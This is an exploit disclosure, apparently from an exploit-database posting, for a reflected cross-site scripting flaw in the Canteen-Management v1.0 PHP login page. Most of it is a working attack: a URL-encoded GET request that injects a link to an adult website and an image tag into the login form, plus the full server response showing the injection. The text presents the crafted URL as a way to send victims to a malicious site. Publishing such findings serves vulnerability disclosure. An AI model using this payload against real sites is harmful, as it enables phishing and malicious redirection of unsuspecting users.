## Exploit Title: Canteen-Management v1.0 - XSS-Reflected
## Exploit Author: nu11secur1ty
## Date: 10.04.2022
## Vendor: Free PHP Projects & Ideas with Source Codes for Students |
mayurik <https://www.mayurik.com/>
## Software:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/Docs
## Reference:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management
## Description:
The name of an arbitrarily supplied URL parameter is copied into the value
of an HTML tag attribute which is encapsulated in double quotation marks.
The attacker can craft a very malicious HTTPS URL redirecting to a very
malicious URL. When the victim clicks into this crafted URL the game will
over for him.
[+]Payload REQUEST:
```HTML
GET /youthappam/login.php/lu555%22%3E%3Ca%20href=%22
https://pornhub.com/%22%20target=%22_blank%22%20rel=%22noopener%20nofollow%20ugc%22%3E%20%3Cimg%20src=%22https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif?token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1%22%20style=%22border:1px%20solid%20black;max-width:100%;%22%20alt=%22Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!%22%3E%20%3C/a%3Emv2me
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106",
"Chromium";v="106"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```
[+]Payload RESPONSE:
```burp
HTTP/1.1 200 OK
Date: Tue, 04 Oct 2022 09:44:55 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
Set-Cookie: PHPSESSID=m1teao9b0j86ep94m6v7ek7fe6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6140
Connection: close
Content-Type: text/html; charset=UTF-8
<link rel="stylesheet" href="assets/css/popup_style.css">
<style>
.footer1 {
position: fixed;
bottom: 0;
width: 100%;
color: #5c4ac7;
text-align: center;
}
</style>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0,
user-scalable=0, minimal-ui">
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="description" content="">
<meta name="keywords" content="">
<meta name="author" content="">
<link rel="icon" type="image/png" sizes="16x16"
href="assets/uploadImage/Logo/favicon.png">
<style type="text/css">
@media print {
#printbtn {
display : none;
}
}
</style>
<title>Youthappam Canteen Management System - by Mayuri K.
Freelancer</title>
<link href="assets/css/lib/chartist/chartist.min.css" rel="stylesheet">
<link href="assets/css/lib/owl.carousel.min.css" rel="stylesheet" />
<link href="assets/css/lib/owl.theme.default.min.css" rel="stylesheet"
/>
<link href="assets/css/lib/bootstrap/bootstrap.min.css"
rel="stylesheet">
<link href="assets/css/helper.css" rel="stylesheet">
<link href="assets/css/style.css" rel="stylesheet">
<link rel="stylesheet"
href="assets/css/lib/html5-editor/bootstrap-wysihtml5.css" />
<link href="assets/css/lib/calendar2/semantic.ui.min.css" rel="stylesheet">
<link href="assets/css/lib/calendar2/pignose.calendar.min.css"
rel="stylesheet">
<link href="assets/css/lib/sweetalert/sweetalert.css" rel="stylesheet">
<link href="assets/css/lib/datepicker/bootstrap-datepicker3.min.css"
rel="stylesheet">
<script type="text/javascript" src="
https://www.gstatic.com/charts/loader.js"></script>
<script type="text/javascript">
google.charts.load("current", {packages:["corechart"]});
google.charts.setOnLoadCallback(drawChart);
function drawChart() {
var data = google.visualization.arrayToDataTable([
['Food', 'Average sale per Day'],
['Masala dosa', 11],
['Chicken 65 ', 2],
['Karapu Boondi', 2],
['Bellam Gavvalu', 2],
['Gummadikaya Vadiyalu', 7]
]);
var options = {
title: 'Food Average Sale per Day',
pieHole: 0.4,
};
var chart = new
google.visualization.PieChart(document.getElementById('donutchart'));
chart.draw(data, options);
}
</script>
</head>
<body class="fix-header fix-sidebar">
<div id="page"></div>
<div id="loading"></div>
<div id="main-wrapper">
<div class="unix-login">
<div class="container-fluid" style="background-image:
url('assets/myimages/background.jpg');
background-color: #ffffff;background-size:cover">
<div class="row">
<div class="col-lg-4 ml-auto">
<div class="login-content">
<div class="login-form">
<center><img
src="./assets/uploadImage/Logo/logo.png" style="width: 100%;"></center><br>
<form
action="/youthappam/login.php/lu555"><a href="https:/pornhub.com/"
target="_blank" rel="noopener nofollow ugc"> <img src="https:/
raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif"
method="post" id="loginForm">
<div class="form-group">
<input type="text" name="username"
id="username" class="form-control" placeholder="Username" required="">
</div>
<div class="form-group">
<input type="password"
id="password" name="password" class="form-control" placeholder="Password"
required="">
</div>
<button type="submit" name="login"
class="f-w-600 btn btn-primary btn-flat m-b-30 m-t-30">Sign in</button>
<!-- <div class="forgot-phone text-right
f-right">
<a href="#" class="text-right f-w-600"> Forgot Password?</a>
</div> -->
<div class="forgot-phone text-left f-left">
<a href = "mailto:[email protected]?subject = Project Development
Requirement&body = I saw your projects. I want to develop a project"
class="text-right f-w-600"> Click here to contact me</a>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<script src="./assets/js/lib/jquery/jquery.min.js"></script>
<script src="./assets/js/lib/bootstrap/js/popper.min.js"></script>
<script src="./assets/js/lib/bootstrap/js/bootstrap.min.js"></script>
<script src="./assets/js/jquery.slimscroll.js"></script>
<script src="./assets/js/sidebarmenu.js"></script>
<script
src="./assets/js/lib/sticky-kit-master/dist/sticky-kit.min.js"></script>
<script src="./assets/js/custom.min.js"></script>
<script>
function onReady(callback) {
var intervalID = window.setInterval(checkReady, 1000);
function checkReady() {
if (document.getElementsByTagName('body')[0] !== undefined) {
window.clearInterval(intervalID);
callback.call(this);
}
}
}
function show(id, value) {
document.getElementById(id).style.display = value ? 'block' : 'none';
}
onReady(function () {
show('page', true);
show('loading', false);
});
</script>
</body>
</html>
```
## Reproduce:
[href](
https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/mayuri_k/2022/Canteen-Management
)
## Proof and Exploit:
[href](https://streamable.com/emg0zo)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>